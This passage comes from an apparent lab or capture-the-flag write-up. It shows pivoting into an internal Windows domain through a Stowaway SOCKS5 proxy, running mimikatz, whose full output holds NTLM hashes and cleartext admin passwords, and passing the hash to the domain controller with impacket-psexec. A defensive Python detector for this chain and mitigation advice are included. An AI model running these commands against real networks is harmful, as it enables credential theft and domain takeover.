  Operating system: Windows Server 2012 R2 Datacenter
  Architecture: x64
  Memory: 2GB
  Domain: c3ting.org
  Domain controller: WIN-LAVRSND6J6N.c3ting.org (IP: 192.168.77.250)
Network configuration:
  Two NICs: Ethernet0 (192.168.81.20) and Ethernet1 (192.168.77.25)
  DC IP: 192.168.77.250, on the same subnet as Ethernet1
Credential information:
  Saved credentials include the domain administrator (C3TING\Administrator) and the local administrator (WEBLOGIC\Administrator)

Third Internal Network Layer
Upload windows_x64_agent.exe and bring a proxy out through it
```shell
# Stowaway admin console: start a listener on node 1 (192.168.81.22)
listen
192.168.81.22:9999
```

```shell
# on the Weblogic host (192.168.81.20)
windows_x64_agent.exe -c 192.168.81.22:9999 -s pass --reconnect 10
```

```shell
# back in the admin console: switch to the new node and open a SOCKS5 proxy
back
use 2
socks 55669 123 123
```

socks5://123:123@127.0.0.1:55669
Upload mimikatz to dump hashes
GitHub - ParrotSec/mimikatz
```shell
mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit" > 1.txt 2>&1
```


```text
  '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
   '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # token::elevate
Token Id  : 0
User name :
SID name  : NT AUTHORITY\SYSTEM

432     {0;000003e7} 0 D 45358          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,20p)       Primary
 -> Impersonated !
 * Process Token : {0;0001de16} 0 D 1778918     C3TING\Administrator    S-1-5-21-495363149-4124706654-1579529781-500   (17g,23p)       Primary
 * Thread Token  : {0;000003e7} 0 D 1790230     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,20p)       Impersonation (Delegation)

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 122390 (00000000:0001de16)
Session           : Batch from 0
User Name         : Administrator
Domain            : C3TING
Logon Server      : WIN-1SJG2BFF54E
Logon Time        : 2025/10/31 14:38:38
SID               : S-1-5-21-495363149-4124706654-1579529781-500
        msv :
         [00010000] CredentialKeys
         * NTLM     : 7ab183888ecafcccf897c4a5a59c8568
         * SHA1     : 65e4580b288c7c555e21f70d81dd6e0b72397ed9
         [00000003] Primary
         * Username : Administrator
         * Domain   : C3TING
         * NTLM     : 7ab183888ecafcccf897c4a5a59c8568
         * SHA1     : 65e4580b288c7c555e21f70d81dd6e0b72397ed9
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : C3TING
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : C3TING.ORG
         * Password : C3ting!@
        ssp :   KO
        credman :
         [00000000]
         * Username : C3TING\Administrator
         * Domain   : C3TING\Administrator
         * Password : C3ting!@
         [00000001]
         * Username : WEBLOGIC\Administrator
         * Domain   : WEBLOGIC\Administrator
         * Password : C3ting!@

Authentication Id : 0 ; 82000 (00000000:00014050)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/10/31 14:38:34
SID               : S-1-5-90-1
        msv :
         [00000003] Primary
         * Username : WEBLOGIC$
         * Domain   : C3TING
         * NTLM     : 46b27275c57726a026781f3ed621b4cb
         * SHA1     : 09c31622476ba96b160a234c14707eba5b7dbc2b
        tspkg :
        wdigest :
         * Username : WEBLOGIC$
         * Domain   : C3TING
         * Password : (null)
        kerberos :
         * Username : WEBLOGIC$
         * Domain   : c3ting.org
         * Password : _okY.Qi_a.>dd32F:z2UKy.O*x n5E9,5Rl_%O&A0;"J:'#pj3Z>NgX8/Us1*h"3lc/Sa%.bqP9lQR)nU1B'>aeR%no9-O3 A[<p W`WRu&>zncfT2'8L]Ez
        ssp :   KO
        credman :

Authentication Id : 0 ; 81982 (00000000:0001403e)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/10/31 14:38:34
SID               : S-1-5-90-1
        msv :
         [00000003] Primary
         * Username : WEBLOGIC$
         * Domain   : C3TING
         * NTLM     : 46b27275c57726a026781f3ed621b4cb
         * SHA1     : 09c31622476ba96b160a234c14707eba5b7dbc2b
        tspkg :
        wdigest :
         * Username : WEBLOGIC$
         * Domain   : C3TING
         * Password : (null)
        kerberos :
         * Username : WEBLOGIC$
         * Domain   : c3ting.org
         * Password : _okY.Qi_a.>dd32F:z2UKy.O*x n5E9,5Rl_%O&A0;"J:'#pj3Z>NgX8/Us1*h"3lc/Sa%.bqP9lQR)nU1B'>aeR%no9-O3 A[<p W`WRu&>zncfT2'8L]Ez
        ssp :   KO
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WEBLOGIC$
Domain            : C3TING
Logon Server      : (null)
Logon Time        : 2025/10/31 14:38:33
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : WEBLOGIC$
         * Domain   : C3TING
         * NTLM     : 46b27275c57726a026781f3ed621b4cb
         * SHA1     : 09c31622476ba96b160a234c14707eba5b7dbc2b
        tspkg :
        wdigest :
         * Username : WEBLOGIC$
         * Domain   : C3TING
         * Password : (null)
        kerberos :
         * Username : weblogic$
         * Domain   : c3ting.org
         * Password : _okY.Qi_a.>dd32F:z2UKy.O*x n5E9,5Rl_%O&A0;"J:'#pj3Z>NgX8/Us1*h"3lc/Sa%.bqP9lQR)nU1B'>aeR%no9-O3 A[<p W`WRu&>zncfT2'8L]Ez
        ssp :   KO
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/10/31 14:38:34
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :   KO
        credman :

Authentication Id : 0 ; 50093 (00000000:0000c3ad)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2025/10/31 14:38:21
SID               :
        msv :
         [00000003] Primary
         * Username : WEBLOGIC$
         * Domain   : C3TING
         * NTLM     : 46b27275c57726a026781f3ed621b4cb
         * SHA1     : 09c31622476ba96b160a234c14707eba5b7dbc2b
        tspkg :
        wdigest :
        kerberos :
        ssp :   KO
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WEBLOGIC$
Domain            : C3TING
Logon Server      : (null)
Logon Time        : 2025/10/31 14:38:20
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : WEBLOGIC$
         * Domain   : C3TING
         * Password : (null)
        kerberos :
         * Username : weblogic$
         * Domain   : C3TING.ORG
         * Password : _okY.Qi_a.>dd32F:z2UKy.O*x n5E9,5Rl_%O&A0;"J:'#pj3Z>NgX8/Us1*h"3lc/Sa%.bqP9lQR)nU1B'>aeR%no9-O3 A[<p W`WRu&>zncfT2'8L]Ez
        ssp :   KO
        credman :

mimikatz(commandline) # exit
Bye!
```
PTH Lateral Movement
GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.
```shell
# route impacket through the SOCKS5 proxy opened on node 2
vi /etc/proxychains4.conf
# add the line:
socks5 10.37.129.2 55669 123 123

proxychains4 impacket-psexec -hashes :7ab183888ecafcccf897c4a5a59c8568 c3ting.org/administrator@192.168.77.250
```
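From the domain controller's point of view, the step above is an NTLM network logon of a domain administrator from the WebLogic host, followed within seconds by an ADMIN$ share access and a new service being installed. The script below is an added detection example, not part of the write-up and not impacket code: it correlates Windows events 4624 (logon type 3 with the NTLM package), 5140 (ADMIN$ access from the same source) and 7045 (service installed) on the same host inside a 60-second window. Pass-the-hash cannot obtain a Kerberos ticket, so the NTLM package on a privileged network logon is the tell. The event records are constructed with simplified field names; the DC name, account and source address are taken from the write-up, the service name and timestamps are invented.

```python
from datetime import datetime, timedelta
from typing import Dict, List

WINDOW = timedelta(seconds=60)          # max gap between the logon and the service install
PRIVILEGED = {"administrator"}          # accounts whose NTLM network logons always matter


def _ts(e: Dict) -> datetime:
    return datetime.fromisoformat(e["time"])


def detect_pth_psexec(events: List[Dict]) -> List[Dict]:
    """Correlate an NTLM network logon (4624, logon type 3) with a service install (7045)
    on the same computer inside WINDOW. An ADMIN$ share access (5140) from the same
    source between the two, or a privileged account, raises the confidence to high."""
    events = sorted(events, key=_ts)
    logons = [e for e in events
              if e["id"] == 4624 and e.get("logon_type") == 3
              and e.get("auth_pkg", "").upper() == "NTLM"]
    shares = [e for e in events
              if e["id"] == 5140 and e.get("share", "").upper().endswith("ADMIN$")]
    findings = []
    for svc in (e for e in events if e["id"] == 7045):
        for lg in logons:
            if lg["computer"] != svc["computer"]:
                continue
            gap = _ts(svc) - _ts(lg)
            if not (timedelta(0) <= gap <= WINDOW):
                continue
            admin_share = any(s["computer"] == svc["computer"] and s["src_ip"] == lg["src_ip"]
                              and _ts(lg) <= _ts(s) <= _ts(svc) for s in shares)
            privileged = lg["user"].lower() in PRIVILEGED
            findings.append({
                "computer": svc["computer"],
                "src_ip": lg["src_ip"],
                "user": f'{lg["domain"]}\\{lg["user"]}',
                "service": svc["service"],
                "image": svc["image"],
                "seconds": int(gap.total_seconds()),
                "confidence": "high" if (admin_share or privileged) else "medium",
            })
    return findings


# Constructed sample events (flattened; real records carry more fields).
SAMPLE_EVENTS = [
    {"id": 4624, "time": "2025-10-31T14:40:01", "computer": "WIN-LAVRSND6J6N",
     "user": "Administrator", "domain": "C3TING", "logon_type": 3,
     "auth_pkg": "NTLM", "src_ip": "192.168.77.25"},
    {"id": 5140, "time": "2025-10-31T14:40:02", "computer": "WIN-LAVRSND6J6N",
     "user": "Administrator", "share": "\\\\*\\ADMIN$", "src_ip": "192.168.77.25"},
    {"id": 7045, "time": "2025-10-31T14:40:03", "computer": "WIN-LAVRSND6J6N",
     "service": "ZkQw", "image": "%SystemRoot%\\ZkQw.exe"},
    # benign controls: a Kerberos logon of a normal user, and a planned agent
    # installation with no NTLM network logon anywhere near it
    {"id": 4624, "time": "2025-10-31T15:10:00", "computer": "WIN-LAVRSND6J6N",
     "user": "jdoe", "domain": "C3TING", "logon_type": 3,
     "auth_pkg": "Kerberos", "src_ip": "192.168.77.40"},
    {"id": 7045, "time": "2025-10-31T16:00:00", "computer": "WIN-LAVRSND6J6N",
     "service": "Sysmon64", "image": "C:\\Windows\\Sysmon64.exe"},
]

if __name__ == "__main__":
    for f in detect_pth_psexec(SAMPLE_EVENTS):
        print(f"[{f['confidence']}] {f['computer']}: {f['user']} from {f['src_ip']} "
              f"installed service {f['service']} ({f['image']}) {f['seconds']}s after NTLM logon")
```

The durable mitigations for the chain seen here are the ones the summary above points at: no saved domain-admin credentials on member servers, and domain admins in the Protected Users group so their NTLM hashes are not usable for network logons in the first place.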

Finally, grab the flag from the desktop
```shell
type flag.txt
```
flag{C3ting&&JACK-ASDIHOEOFAO124124ASDFFOHIAowefqwfwf}